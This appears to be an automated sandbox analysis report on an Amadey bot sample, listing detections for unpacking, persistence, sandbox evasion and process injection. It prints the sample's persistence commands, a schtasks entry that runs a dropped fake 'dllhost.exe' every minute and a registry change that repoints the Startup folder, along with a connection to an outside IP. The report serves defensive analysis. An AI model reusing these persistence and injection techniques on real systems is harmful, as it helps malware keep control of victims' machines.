              Source: Binary string: wntdll.pdbUGP source: S7AGd447vH.exe, 00000000.00000003.1704342589.0000000022810000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022664000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749047293.000000002282A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749185768.00000000229D0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818941784.000000002268F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819091073.0000000022830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: S7AGd447vH.exe, 00000000.00000003.1704342589.0000000022810000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022664000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749047293.000000002282A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749185768.00000000229D0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818941784.000000002268F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819091073.0000000022830000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: combase.pdbUGP source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022900000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749567916.0000000022AB0000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749409581.0000000022823000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819408619.0000000022688000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819679892.0000000022910000.00000004.00001000.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Detected unpacking (changes PE section rights)
              Source: C:\Users\user\Desktop\S7AGd447vH.exeUnpacked PE file: 0.2.S7AGd447vH.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeUnpacked PE file: 7.2.dllhost.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
              Detected unpacking (overwrites its own PE header)
              Source: C:\Users\user\Desktop\S7AGd447vH.exeUnpacked PE file: 0.2.S7AGd447vH.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeUnpacked PE file: 7.2.dllhost.exe.400000.0.unpack
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00402310 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00402310
              Source: dllhost.exe.0.drStatic PE information: real checksum: 0x64e0b should be: 0x72178
              Source: S7AGd447vH.exeStatic PE information: real checksum: 0x64e0b should be: 0x72178
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00411076 push ecx; ret 0_2_00411089
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00401DF4 push eax; ret 11_2_00401E22

              Persistence and Installation Behavior

              barindex
              Yara detected Amadey bot
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: dllhost.exe PID: 7608, type: MEMORYSTR
              Source: C:\Users\user\Desktop\S7AGd447vH.exeFile created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeJump to dropped file

              Boot Survival

              barindex
              Creates an undocumented autostart registry key
              Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders StartupJump to behavior
              Uses schtasks.exe or at.exe to add and modify task schedules
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /F
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00405AE4 SetWindowLongW,CreateCompatibleDC,SetTimer,LoadStringW,GetWindowLongW,KillTimer,AnimateWindow,PostMessageW,PostQuitMessage,BeginPaint,BitBlt,EndPaint,IsIconic,GetWindowRect,OffsetRect,CreateRoundRectRgn,SetWindowRgn,DeleteObject,DeleteObject,DefWindowProcW,11_2_00405AE4
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
              Source: dllhost.exe, 00000007.00000002.1820379958.00000000006A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK.DLL7B
              Source: S7AGd447vH.exe, 00000000.00000003.1704847684.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749735106.000000007FE31000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: COMBASE.DLL%SYSTEMROOT%\SYSTEM32\COMBASE.DLLZWPROTECTVIRTUALMEMORYNTDLL.DLL%SYSTEMROOT%\SYSTEM32\NTDLL.DLLISWOW64PROCESSKERNEL32.DLLASWHOOK.DLL
              Source: S7AGd447vH.exe, 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, S7AGd447vH.exe, 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: 3ISWOW64PROCESSKERNEL32.DLLASWHOOK.DLLCOMBASE.DLL%SYSTEMROOT%\SYSTEM32\COMBASE.DLLZWPROTECTVIRTUALMEMORYNTDLL.DLL%SYSTEMROOT%\SYSTEM32\NTDLL.DLL@B
              Source: S7AGd447vH.exe, 00000000.00000002.1708919180.000000000239F000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000002.1820486945.00000000022BF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
              Source: dllhost.exe, dllhost.exe, 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, dllhost.exe, 00000007.00000003.1819863860.000000007FE31000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ASWHOOK.DLL
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00407DE4 rdtsc 11_2_00407DE4
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeWindow / User API: threadDelayed 887Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeWindow / User API: threadDelayed 1123Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeWindow / User API: threadDelayed 4077Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7612Thread sleep time: -2610000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7724Thread sleep time: -159660000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7716Thread sleep time: -202140000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7652Thread sleep time: -84750s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7720Thread sleep time: -6660000s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe TID: 7724Thread sleep time: -733860000s >= -30000sJump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004048B0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,0_2_004048B0
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeThread delayed: delay time: 30000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeThread delayed: delay time: 180000Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeThread delayed: delay time: 180000Jump to behavior
              Source: dllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1775452885.00000000008C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00407DE4 rdtsc 11_2_00407DE4
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004154F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004154F3
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00402310 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,11_2_00402310
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_3_00580046 mov eax, dword ptr fs:[00000030h]0_3_00580046
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004169A2 mov eax, dword ptr fs:[00000030h]0_2_004169A2
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00412C11 mov eax, dword ptr fs:[00000030h]0_2_00412C11
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_7FE4208F mov eax, dword ptr fs:[00000030h]0_2_7FE4208F
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 1_3_005F0046 mov eax, dword ptr fs:[00000030h]1_3_005F0046
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 7_3_004E0046 mov eax, dword ptr fs:[00000030h]7_3_004E0046
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 7_2_7FE4208F mov eax, dword ptr fs:[00000030h]7_2_7FE4208F
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00406AE4 mov eax, dword ptr fs:[00000030h]11_2_00406AE4
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00401F40 GetUserNameW,GetUserNameW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetUserNameW,LookupAccountNameW,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,LookupAccountNameW,ConvertSidToStringSidW,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LocalFree,0_2_00401F40
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00411203 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00411203
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004154F3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004154F3
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00410E53 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00410E53
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00410FB8 SetUnhandledExceptionFilter,0_2_00410FB8
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_004061E4 HeapCreate,HeapAlloc,HeapAlloc,HeapAlloc,TlsAlloc,TlsSetValue,RtlAddVectoredExceptionHandler,RtlRemoveVectoredExceptionHandler,TlsFree,KiUserCallbackDispatcher,HeapDestroy,11_2_004061E4
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00401E4C SetUnhandledExceptionFilter,11_2_00401E4C
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 11_2_00401E3D SetUnhandledExceptionFilter,11_2_00401E3D

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeNetwork Connect: 72.52.178.23 80Jump to behavior
              Contains functionality to inject code into remote processes
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_004023F0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,VirtualFree,0_2_004023F0
              Source: C:\Users\user\Desktop\S7AGd447vH.exeProcess created: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN dllhost.exe /TR "C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exe" /FJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\Jump to behavior
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_00410C73 cpuid 0_2_00410C73
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeQueries volume information: C:\Users\user\AppData\Local\Temp\152122461226 VolumeInformationJump to behavior
